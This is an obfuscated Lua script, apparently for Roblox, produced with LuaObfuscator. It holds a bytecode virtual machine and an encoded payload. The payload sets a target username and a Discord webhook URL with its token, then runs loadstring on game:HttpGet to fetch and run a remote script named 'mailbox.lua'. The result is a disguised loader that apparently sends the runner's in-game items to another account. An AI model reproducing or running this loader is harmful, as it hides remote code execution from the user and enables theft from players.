--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.16) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v98=v5(v84,v19);v19=nil;return v98;else return v84;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v85=(v31/((5 -3)^(v32-(2 -1))))%((1 + (1271 -(226 + 1044)))^(((v33-((4 -3) -0)) -(v32-(2 -(118 -(32 + 85))))) + (1638 -(1523 + 114)))) ;return v85-(v85%(1 + 0 + 0)) ;else local v86=(2 -0)^(v32-(620 -(555 + 64))) ;return (((v31%(v86 + v86))>=v86) and (932 -(857 + 74))) or 0 ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 + 0 ;local v36;local v37;while true do if (v35==(957 -(892 + (245 -(67 + 113))))) then v36,v37=v1(v16,v18,v18 + (4 -2) );v18=v18 + 2 ;v35=1 -0 ;end if ((1 -0)==v35) then return (v37 * (606 -(87 + 263))) + v36 ;end end end local function v23()local v38=(997 -(915 + 82)) + (0 -0) ;local v39;local v40;local v41;local v42;while true do if (v38==(2 -1)) then return (v42 * (12338840 + 4438376)) + (v41 * 65536) + (v40 * (1017 -761)) + v39 ;end if (v38==(952 -(802 + 150))) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v38=1 + 0 ;end end end local function v24()local v43=v23();local v44=v23();local v45=1 + 0 ;local v46=(v20(v44,1 -0 ,(384 + 823) -(1069 + 118) ) * ((4 -2)^(69 -37))) + v43 ;local v47=v20(v44,21,6 + 25 );local v48=((v20(v44,56 -24 )==(1 + 0)) and  -(792 -(368 + 423))) or (3 -2) ;if (v47==(18 -(10 + 8))) then if (v46==((0 + 0) -0)) then return v48 * (442 -(416 + 26)) ;else v47=(775 -(201 + 571)) -2 ;v45=0;end elseif (v47==(879 + (2306 -(116 + 1022)))) then return ((v46==(0 -0)) and (v48 * ((439 -(145 + 293))/0))) or (v48 * NaN) ;end return v8(v48,v47-((6049 -4596) -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 287 + 201))^52))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v65=860 -(814 + 45) , #v50 do v51[v65]=v2(v1(v3(v50,v65,v65)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 -0 ;local v53;local v54;local v55;local v56;local v57;local v58;while true do local v67=0;while true do if (v67==0) then if (v52==(678 -(534 + 141))) then local v95=0 + 0 ;local v96;while true do if (v95==0) then v96=0 + 0 ;while true do if (v96==0) then local v111=0;while true do if (v111~=(0 + 0)) then else for v150=1,v23() do v54[v150-(1 -0) ]=v28();end return v56;end end end end break;end end end if (v52~=0) then else v53={};v54={};v55={};v52=1;end v67=1 -0 ;end if (v67~=(2 -1)) then else if (v52==(2 + 0)) then local v97=0;while true do if ((0 + 0)==v97) then for v100=397 -(115 + 281) ,v57 do local v101=0 -0 ;local v102;local v103;local v104;local v105;while true do if ((1 + 0)~=v101) then else v104=nil;v105=nil;v101=2;end if (v101==2) then while true do if (v102==1) then v105=nil;while true do if (v103==(0 -0)) then local v156=0 -0 ;while true do if (v156==(868 -(550 + 317))) then v103=1;break;end if ((0 -0)==v156) then v104=v21();v105=nil;v156=1;end end end if (v103~=(1 -0)) then else if (v104==(2 -1)) then v105=v21()~=0 ;elseif (v104==2) then v105=v24();elseif (v104==3) then v105=v25();end v58[v100]=v105;break;end end break;end if (v102==(285 -(134 + 151))) then v103=1665 -(970 + 695) ;v104=nil;v102=1 -0 ;end end break;end if (v101==(1990 -(582 + 1408))) then v102=0;v103=nil;v101=1;end end end v56[3]=v21();v97=3 -2 ;end if (v97~=1) then else for v106=1 -0 ,v23() do local v107=0 -0 ;local v108;local v109;local v110;while true do if (v107~=1) then else v110=nil;while true do if (v108==0) then v109=0;v110=nil;v108=1825 -(1195 + 629) ;end if (v108==(1 -0)) then while true do if (v109==(241 -(187 + 54))) then v110=v21();if (v20(v110,781 -(162 + 618) ,1 + 0 )==0) then local v163=0;local v164;local v165;local v166;local v167;local v168;while true do if (v163==(0 + 0)) then v164=0;v165=nil;v163=1;end if (v163==(3 -1)) then v168=nil;while true do if (v164~=(1 -0)) then else local v171=0 + 0 ;while true do if (v171==(1636 -(1373 + 263))) then v167=nil;v168=nil;v171=1001 -(451 + 549) ;end if (v171==1) then v164=1 + 1 ;break;end end end if ((0 -0)==v164) then local v172=0;local v173;while true do if (v172~=0) then else v173=0 -0 ;while true do if (v173~=0) then else v165=1384 -(746 + 638) ;v166=nil;v173=1;end if ((1 + 0)==v173) then v164=1;break;end end break;end end end if ((2 -0)==v164) then while true do if (v165==(341 -(218 + 123))) then local v174=1581 -(1535 + 46) ;local v175;while true do if (0==v174) then v175=0;while true do if (v175==(1 + 0)) then v165=1;break;end if (v175~=(0 + 0)) then else local v183=0;while true do if (v183==0) then v166=v20(v110,2,3);v167=v20(v110,564 -(306 + 254) ,1 + 5 );v183=1;end if (v183~=(1 -0)) then else v175=1;break;end end end end break;end end end if (v165~=(1470 -(899 + 568))) then else if (v20(v167,2 + 1 ,3)==1) then v168[4]=v58[v168[9 -5 ]];end v53[v106]=v168;break;end if (v165==(605 -(268 + 335))) then local v177=0;local v178;while true do if (v177~=(290 -(60 + 230))) then else v178=572 -(426 + 146) ;while true do if (v178~=(1 + 0)) then else v165=1459 -(282 + 1174) ;break;end if (v178~=(811 -(569 + 242))) then else if (v20(v167,1,2 -1 )==1) then v168[2]=v58[v168[1 + 1 ]];end if (v20(v167,1026 -(706 + 318) ,2)==(1252 -(721 + 530))) then v168[3]=v58[v168[3]];end v178=1;end end break;end end end if (v165==1) then local v179=0;local v180;while true do if (v179==0) then v180=0;while true do if (v180==(1272 -(945 + 326))) then v165=2;break;end if (v180==(0 -0)) then local v184=0;while true do if (v184==(0 + 0)) then v168={v22(),v22(),nil,nil};if (v166==(0 + 0)) then local v189=1500 -(1408 + 92) ;local v190;while true do if ((1086 -(461 + 625))~=v189) then else v190=1288 -(993 + 295) ;while true do if (v190~=(0 + 0)) then else v168[3]=v22();v168[1175 -(418 + 753) ]=v22();break;end end break;end end elseif (v166==(1 + 0)) then v168[3]=v23();elseif (v166==2) then v168[1 + 2 ]=v23() -((1 + 1)^16) ;elseif (v166==3) then local v195=0 + 0 ;local v196;while true do if (v195==0) then v196=529 -(406 + 123) ;while true do if (v196~=0) then else v168[3]=v23() -((1771 -(1749 + 20))^(4 + 12)) ;v168[1326 -(1249 + 73) ]=v22();break;end end break;end end end v184=1 + 0 ;end if (v184~=(1146 -(466 + 679))) then else v180=1;break;end end end end break;end end end end break;end end break;end if (v163==1) then v166=nil;v167=nil;v163=4 -2 ;end end end break;end end break;end end break;end if (v107~=(0 -0)) then else v108=0;v109=nil;v107=1;end end end v52=1903 -(106 + 1794) ;break;end end end if (v52~=(1 + 0)) then else v56={v53,v54,nil,v55};v57=v23();v58={};v52=5 -3 ;end break;end end end end local function v29(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v87=0,v76 do if (v87>=v70) then v74[v87-v70 ]=v75[v87 + 1 ];else v78[v87]=v75[v87 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do local v88=0;while true do if (v88==1) then if (v81<=8) then if (v81<=3) then if (v81<=1) then if (v81==0) then do return;end else v78[v80[2]]=v61[v80[3]];end elseif (v81>2) then v78[v80[2]]=v80[3]~=0 ;else v61[v80[3]]=v78[v80[2]];end elseif (v81<=5) then if (v81>4) then v78[v80[2]]();else v78[v80[2]]=v80[3];end elseif (v81<=6) then v61[v80[3]]=v78[v80[2]];elseif (v81>7) then v78[v80[2]]=v61[v80[3]];else local v138=0;local v139;local v140;local v141;local v142;while true do if (v138==0) then v139=v80[2];v140,v141=v71(v78[v139](v13(v78,v139 + 1 ,v80[3])));v138=1;end if (v138==2) then for v158=v139,v73 do v142=v142 + 1 ;v78[v158]=v140[v142];end break;end if (v138==1) then v73=(v141 + v139) -1 ;v142=0;v138=2;end end end elseif (v81<=12) then if (v81<=10) then if (v81==9) then do return;end else local v121=v80[2];local v122=v78[v80[3]];v78[v121 + 1 ]=v122;v78[v121]=v122[v80[4]];end elseif (v81==11) then v78[v80[2]]=v80[3]~=0 ;else local v127=v80[2];local v128=v78[v80[3]];v78[v127 + 1 ]=v128;v78[v127]=v128[v80[4]];end elseif (v81<=14) then if (v81>13) then v78[v80[2]]=v80[3];else local v134=0;local v135;while true do if (v134==0) then v135=v80[2];v78[v135]=v78[v135](v13(v78,v135 + 1 ,v73));break;end end end elseif (v81<=15) then v78[v80[2]]();elseif (v81==16) then local v143=v80[2];v78[v143]=v78[v143](v13(v78,v143 + 1 ,v73));else local v145=0;local v146;local v147;local v148;local v149;while true do if (v145==0) then v146=v80[2];v147,v148=v71(v78[v146](v13(v78,v146 + 1 ,v80[3])));v145=1;end if (v145==2) then for v161=v146,v73 do local v162=0;while true do if (v162==0) then v149=v149 + 1 ;v78[v161]=v147[v149];break;end end end break;end if (1==v145) then v73=(v148 + v146) -1 ;v149=0;v145=2;end end end v72=v72 + 1 ;break;end if (v88==0) then v80=v68[v72];v81=v80[1];v88=1;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!083O0003083O00557365724E616D65030A3O0044726B787A4E6967687403073O00576562482O6F6B037C3O00682O7470733A2O2F646973636F7264612O702E636F6D2F6170692F776562682O6F6B732F2O31363538373235362O3134363536303634322F756A564571694632425A41446C493032416A72654B6E595333384742466F2O555F54363155384C716A6638316E304675714E55664E626173555968523942337A56514574030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C7561000D3O0012043O00023O0012063O00013O0012043O00043O0012063O00033O0012013O00053O001201000100063O00200A000100010007001204000300084O0003000400014O0007000100044O00105O00022O00053O000100012O00093O00017O00",v9(),...);
